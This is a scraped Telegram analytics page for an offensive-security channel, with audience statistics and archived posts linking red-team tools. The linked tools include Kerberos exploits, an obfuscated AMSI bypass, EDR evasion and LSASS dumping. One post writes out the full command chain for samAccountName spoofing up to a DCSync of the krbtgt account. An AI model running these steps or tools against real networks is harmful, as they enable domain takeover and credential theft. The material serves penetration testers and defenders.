ru
Feedback
APT

APT

Открыть в Telegram

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Больше
Россия45 554Технологии и приложения8 834

📈 Аналитический обзор Telegram-канала APT

Канал APT (@apt_notes) языкового сегмента Английский является активным участником. Сейчас сообщество объединяет 14 682 подписчиков, занимая 8 834 место в категории Технологии и приложения и 45 554 место в регионе Россия.

📊 Показатели аудитории и динамика

С момента создания невідомо проект демонстрирует стремительный рост, собрав аудиторию из 14 682 подписчиков.

Согласно последним данным от 13 июня, 2026, канал показывает стабильную активность. За последние 30 дней изменение числа участников составило 414, а за последние 24 часа — 17, при этом общий охват остаётся высоким.

  • Статус верификации: Не верифицирован
  • Уровень вовлечённости (ER): Средний показатель вовлечённости аудитории составляет 50.76%. В первые 24 часа после публикации контент обычно набирает N/A% реакций от общего числа подписчиков.
  • Охват публикаций: В среднем каждый пост получает 7 449 просмотров. В течение первых суток публикация набирает 0 просмотров.
  • Реакции и взаимодействия: Аудитория активно поддерживает контент: среднее количество реакций на один пост — 20.

📝 Описание и контентная политика

Автор описывает ресурс как площадку для выражения субъективного мнения:
This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Благодаря высокой частоте обновлений (последние данные получены 14 июня, 2026) канал поддерживает актуальность и высокий уровень охвата публикаций. Аналитика показывает, что аудитория активно взаимодействует с контентом, что делает его важной точкой влияния в категории Технологии и приложения.

14 682
Подписчики
+1724 часа
+1027 дней
+41430 день
Архив постов
APT
APT
14 682
GitLab CI jobs unmasked passwords scanner https://github.com/Whitespots-OU/gitlab-ci-secrets #tools #secrets #devsecops

APT
APT
14 682
Find-Hardcoded You can find hardcoded API key, secret, token, etc... https://github.com/arijitdirghanji/Find-Hardcoded #andro
Find-Hardcoded You can find hardcoded API key, secret, token, etc... https://github.com/arijitdirghanji/Find-Hardcoded #android #apk #find #secrets #tools

APT
APT
14 682
Exploiting CVE-2021-42287/CVE-2021-42278 (Linux) https://github.com/WazeHell/sam-the-admin #ad #pac #s4u2self #windows #redte
Exploiting CVE-2021-42287/CVE-2021-42278 (Linux) https://github.com/WazeHell/sam-the-admin #ad #pac #s4u2self #windows #redteam

APT
APT
14 682
ADenum ADEnum is a pentesting tool that allows to find misconfiguration through the protocol LDAP and exploit some of those w
ADenum ADEnum is a pentesting tool that allows to find misconfiguration through the protocol LDAP and exploit some of those weaknesses with Kerberos. https://github.com/SecuProject/ADenum #ad #ldap #kerberos #enumeration #tools

APT
APT
14 682
Automated Exploitation of the CVE-2021-42287/CVE-2021-42278 (Windows) Binary: https://github.com/cube0x0/noPac PowerShell: ht
Automated Exploitation of the CVE-2021-42287/CVE-2021-42278 (Windows) Binary: https://github.com/cube0x0/noPac PowerShell: https://gist.github.com/S3cur3Th1sSh1t/0ed2fb0b5ae485b68cbc50e89581baa6 #ad #pac #s4u2self #windows #redteam

APT
APT
14 682
FUD AMSI Bypass Just released a new obfuscated AMSI bypass script based on 'amsiInitFailed'. https://github.com/tihanyin/PSSW
FUD AMSI Bypass Just released a new obfuscated AMSI bypass script based on 'amsiInitFailed'. https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_12.ps1 #amsi #bypass #windows #pentest

APT
APT
14 682
Domain Admin in only 5 minutes via Name Impersonation (CVE-2021-42278) Before patch, there was a weird behavior on the KDC. When requesting a service ticket, if the KDC wasn't able to find the user behind the TGT, it would make another lookup, but this time with an "$" at the end of the name This allows for a new kind of spoofing attack where attackers that have enough control over a machine account can spoof a domain controller. Example: 0. Create a сomputer account addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword' 1. Clear its SPNs addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController 2. Rename the computer (computer -> DC) renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password' 3. Obtain a TGT getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword' 4. Reset the computer name renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password' 5. Bbtain a service ticket with S4U2self by presenting the previous TGT KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController' 6. DCSync by presenting the service ticket KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local' # https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html # https://exploit.ph/more-samaccountname-impersonation.html # https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing # https://www.geekby.site/2021/12/samaccountname-spoofing/ # https://gist.github.com/snovvcrash/3bf1a771ea6b376d374facffa9e43383 #ad #pac #s4u2self #windows #redteam

APT
APT
14 682
#meme
#meme

APT
APT
14 682
ldapconsole It's a script allowing to perfom custom LDAP queries to a Windows domain and select specific attributes. Features — Authenticate with password — Authenticate with LM:NT hashes — Authenticate with kerberos ticket https://github.com/p0dalirius/ldapconsole #ldap #query #tools

APT
APT
14 682
Log4j RCE — CVE-2021-44228 The vulnerability allows for unauthenticated remote code execution. Log4j 2 is an open source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. These include enterprise applications as well as numerous cloud services. # https://www.lunasec.io/docs/blog/log4j-zero-day/ # https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6 # https://github.com/whwlsfb/Log4j2Scan # https://github.com/Cybereason/Logout4Shell #apache #log4j #cve #rce

APT
APT
14 682
Example Reports If you're looking for examples of pentest reports, globalcptc has released redacted versions of the teams that made it to finals for the last 2 years (25 reports) https://github.com/nationalcptc/report_examples

APT
APT
14 682
Detecting NTLM Relay Attacks https://posts.bluraven.io/detecting-ntlm-relay-attacks-d92e99e68fb9 #detection #ntlm #relay #blueteam

APT
APT
14 682
ipsourcebypass This Python script can be used to bypass IP source restrictions using HTTP headers. https://github.com/p0dalir
ipsourcebypass This Python script can be used to bypass IP source restrictions using HTTP headers. https://github.com/p0dalirius/ipsourcebypass #ip #header #bypass #bugbounty

APT
APT
14 682
Process Ghosting — EDR Evasion The technique Process Herpaderping attempts to perform evasion by performing modification of the file (image tampering) which creates the process on a windows system. Deleting also the file during the creation of the process can have the same results. Even though some endpoint products have mature over the years and are able to detect complex threats organizations should constantly test the capabilities of their solution and should find alternate methods of detection even for the same technique. https://pentestlaboratories.com/2021/12/08/process-ghosting/ #av #evasion #process #redteam #blueteam

APT
APT
14 682
MAL-CL — Malicious Command-Line MAL-CL aims to collect and document real world and most common "malicious" command-line execu
MAL-CL — Malicious Command-Line MAL-CL aims to collect and document real world and most common "malicious" command-line executions of different tools and utilities while providing actionable detections and resources for the blue team. https://github.com/3CORESec/MAL-CL #windows #cli #detection #blueteam #redteam

APT
APT
14 682
Downgrading Kerberos Encryption & Why It Doesn’t Work In Server 2019 How we make Kerberos tickets use weaker encryption, the "TGT delegation trick", and why none of it works if the domain controllers are Windows Server 2019. https://vbscrub.com/2021/12/04/downgrading-kerberos-encryption-amp-why-it-doesnt-work-in-server-2019/ #kerberos #windows2019 #pentest

APT
APT
14 682
EDRSandBlast EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring. https://github.com/wavestone-cdt/EDRSandblast #lsass #dump #etw #redteam

APT
APT
14 682
Extracting passwords from hiberfil.sys When in password hunting mode and having access to the filesystem of the target, most
Extracting passwords from hiberfil.sys When in password hunting mode and having access to the filesystem of the target, most people would reach out to SAM and/or extracting cached credentials. People often overlooked is hiberfil.sys and/or virtual machine snapshots or memory dumps, as they usually contain passwords in plain text. https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps #hiberfil #dump #password

APT
APT
14 682
Abusing Leaked Handles to Dump LSASS Memory # https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html # https://github.com/antonioCoco/MalSeclogon #seclogon #lsass #dump #redteam

APT
APT
14 682
#meme
#meme

APT - Статистика и аналитика Telegram-канала @apt_notes